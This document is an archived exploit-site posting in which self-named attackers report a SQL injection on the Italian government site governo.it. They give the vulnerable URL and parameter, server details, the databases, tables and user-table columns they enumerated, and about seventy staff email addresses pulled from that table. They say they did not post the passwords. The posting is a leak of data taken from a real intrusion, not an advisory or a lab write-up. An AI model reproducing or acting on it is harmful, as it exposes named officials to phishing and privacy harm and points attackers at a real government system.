exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Governo.it SQL Injection

Governo.it SQL Injection
Posted Jan 6, 2011
Authored by SYSTEM_OVERIDE, God_Of_Pain, LordTittiS

Governo.it suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 707519420fd7175ebb27b3fcc9da0a3b508efbd7758c61f9a21e1fd68f006a39

Governo.it SQL Injection

Change Mirror Download
==============================================================
Governo.it
**************************************************************
SQL Injection Vulnerability
**************************************************************

# We are:
# ------------------------------------------------------------
# God_Of_Pain
# Lord TittiS
# SYSTEM_OVERIDE
# ------------------------------------------------------------
# Date: 28/12/2010
# ------------------------------------------------------------
# [1] Site And Server Info
# [2] SQL Detail
# [3] Users Found Information
# ------------------------------------------------------------


* [1] Site And Server Info


# Bug Url:
http://www.governo.it/notizie/not_notizia.asp?idno=3349 (Same site)
http://palazzochigi.it/notizie/not_notizia.asp?idno=3349 (Same site)

# Powered By: ASP.NET

# Server Detail: Microsoft SQL Server 2000 - 8.00.2039 (Intel X86)

# Server Name: WEB-VSQL1\INST1

# Current DB: chigi_intranet

# Database : MSSQL 2005





* [2] SQL Detail


# Databases List:
- chigi_intranet
- master
- tempdb
- model (LOCKED)
- msdb
- AAA (LOCKED)
- chigi_mag2006
- chigi_intranet
- chigi_developer
- sondaggidb (LOCKED)
- AffariRegionali_BO (LOCKED)

# Tables of 3 DB:

[+] chigi_intranet:
doc_tipi
qst_datipersonali
doc_target
doc_prov_tipi
eml_scrivi_a
doc_prov_aree
doc_monitoraggio_soggetto
eml_categoria
doc_monitoraggio_sede
doc_monitoraggio_organo
doc_monitoraggio_azione
doc_lingue
eml_autori_aree
doc_iter
doc_fonti
doc_dossier
doc_documenti_swap
doc_atti_tipi
doc_associatipi
Composizionenewsletter
eml_aree
Argomento
eml_registra_operazione
ana_amministratori_pubblici
qst_pianodiazione
web_webletter_log
pag_sezioni_pagine
pag_documenti_sezioni
faq_keyword
faq_faq_gruppi_keyword
doc_documenti_target
doc_documenti_monitoraggio
doc_documenti_links
doc_documenti_fonti
doc_documenti_dossier
doc_documenti_allegati
web_webletter_testo
pag_sezioni
int_interrogazioni
faq_form_richieste
faq_faq
faq_diritti_utenti
doc_monitoraggio_soggetto_prov_tipi
pag_autori_pagine
doc_monitoraggio_azione_prov_tipi
doc_fonti_tipi
doc_documenti
ana_amministratori_pubblici_mail
nwl_Newsletter
web_webletter
temp_monitoraggio
Results
pag_pagine
nwl_Notizianewsletter
nwl_Notizia_link
nwl_Notizia_argomento
nwl_Composizionenewsletter
nwl_Argomento
not_notizia_pub
not_notizia_link
not_notizia_argomento
not_notizia
not_immagini
log_ricerca
log_Domande
int_tipi_interrogazione
int_sedi
int_gruppi_parlamentari
ana_autori
gen_governi
faq_gruppi_keyword
faq_aree_tematiche
dtproperties
faq_aree
qst_semplificazione_proposte

[+] Master:
spt_server_info
spt_datatype_info
MSreplication_options
spt_datatype_info_ext
spt_provider_types
spt_fallback_usg
spt_fallback_dev
spt_fallback_db
spt_values
spt_monitor


[+] Msdb:
sysjobschedules
RTblIfaceMem
backupfile
syscategories
systargetservers
RTblWorkspaceItems
restorehistory
systargetservergroups
RTblDatabaseVersion
systargetservergroupmembers
sysalerts
RTblDTSProps
RTblVersionAdminInfo
restorefile
sysoperators
sysnotifications
RTblParameterDef
restorefilegroup
systaskids
syscachedcredentials
RTblIfaceHier
logmarkhistory
RTblNamedObj
sysdtscategories
sysdtspackages
RTblTypeInfo
sysdtspackagelog
RTblScriptDefs
RTblOLPProps
sysdtssteplog
RTblEnumerationDef
sysdtstasklog
RTblClassExtension
RTblSumInfo
RTblMDSProps
RTblEnumerationValueDef
RTblUMLProps
sysdbmaintplans
sysdbmaintplan_jobs
RTblUMXProps
sysdbmaintplan_databases
RTblSIMProps
sysdbmaintplan_history
RTblGENProps
RTblDTMProps
log_shipping_primaries
log_shipping_secondaries
RTblDBMProps
RTblEQMProps
log_shipping_monitor
mswebtasks
log_shipping_databases
log_shipping_plans
RTblVersions
log_shipping_plan_databases
log_shipping_plan_history
RTblDBXProps
RTblRelships
RTblSites
RTblProps
RTblRelshipProps
RTblPropDefs
RTblRelColDefs
RTblIfaceDefs
backupmediaset
sqlagent_info
RTblClassDefs
sysdownloadlist
backupmediafamily
sysjobhistory
sysjobs
RTblTFMProps
RTblRelshipDefs
backupset
sysjobservers
RTblTypeLibs
sysjobsteps



* [3] Users Found Information

The table "ana_autori" would seem the users table.
Search the columns:

aaut_alias
aaut_approva
aaut_cancella
aaut_cognome
aaut_consultazione
aaut_dipartimento
aaut_dossier
aaut_email
aaut_fonti
aaut_gestpagine
aaut_gestutenti
aaut_governi
aaut_id
aaut_logs
aaut_newsletter
aaut_nome
aaut_note
aaut_password
aaut_questiontime
aaut_rassegna
aaut_rep_amministratori
aaut_scrivia
aaut_sigla
aaut_tipi

Get data from "aaut_mail" and "aaut_password"

Result is:
a.bellino@governo.it
a.decaroli@palazzochigi,it
a.griffo@governo.it
a.messina@governo.it
a.milza@governo.it
b.alongi@governo.it
b.altomonte@governo.it
b.casini@governo.it
b.coppa@governo.it
b.pastorelli@governo.it
c.antonelli@governo.it
c.canato@governo.it
c.foglia@palazzochigi.it
c.nicolo@palazzochigi.it
c.zoffoli@governo.it
cips @ciaps.com
d.dellavecchia@governo.it
d.integlia@governo.it
d.pedercini@palazzochigi.it
didom@governo.it
documentazione.dagl@palazzochigi.it
e.grassi@governo.it
e.lombardo@governo.it
f.barazzoni@governo.it
f.casinelli@governo.it
f.montano@palazzochigi.it
f.salzano@governoit
fsi@palazzochigi.it
g.benigni@governo.it
g.cioeta@governo.it
g.delia@palazzochigi.it
g.pirrello@governo.it
i.madonna@governo.it
l.alfonso@governo.it
l.cusano@governo.it
l.debiase@palazzochigi.it
l.iannarilli@palazzochigi.it
l.loreto@palazzochigi.it
l.malatesta@governo.it
l.nencini@governo.it
l.pilozzi@governo.it
l.saccoccia@palazzochigi.it
m.baldi@governo.it
m.cobianchi@governo.it
m.didiodato@governo.it
m.divico@governo.it
m.lafalce@palazzochigi.it
m.lusini@palazzochigi.it
o.amari@palazzochigi.it
p.laurenzi@governo.it
p.sabatella@palazzochigi.it
p.sirocchi@governo.it
presi@gov.it
r.bonanni@governo.it
r.boschi@palazzochigi.it
r.carpino@governo.it
r.fronzuto@governo.it
r.gallucci@governo.it
r.rega@palazzochigi.it
redazione.web@palazzochigi.it
s.diplacido@governo.it
s.fantauzzi@governo.it
s.masini@governo.it
s.rossibrigante@palazzochigi.it
s.tarquini@governo.it
salaregia@palazzochigi.it
t.antonelli@governo.it
t.benini@governo.it
t.vannozzi@governo.it
uff@gov.it
urp@palazzochigi.it
v.caputo@palazzochigi.it
v.tretter@governo.it
webmaster@governo.it

I do not post the passwords.

# End :)
==============================================================
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close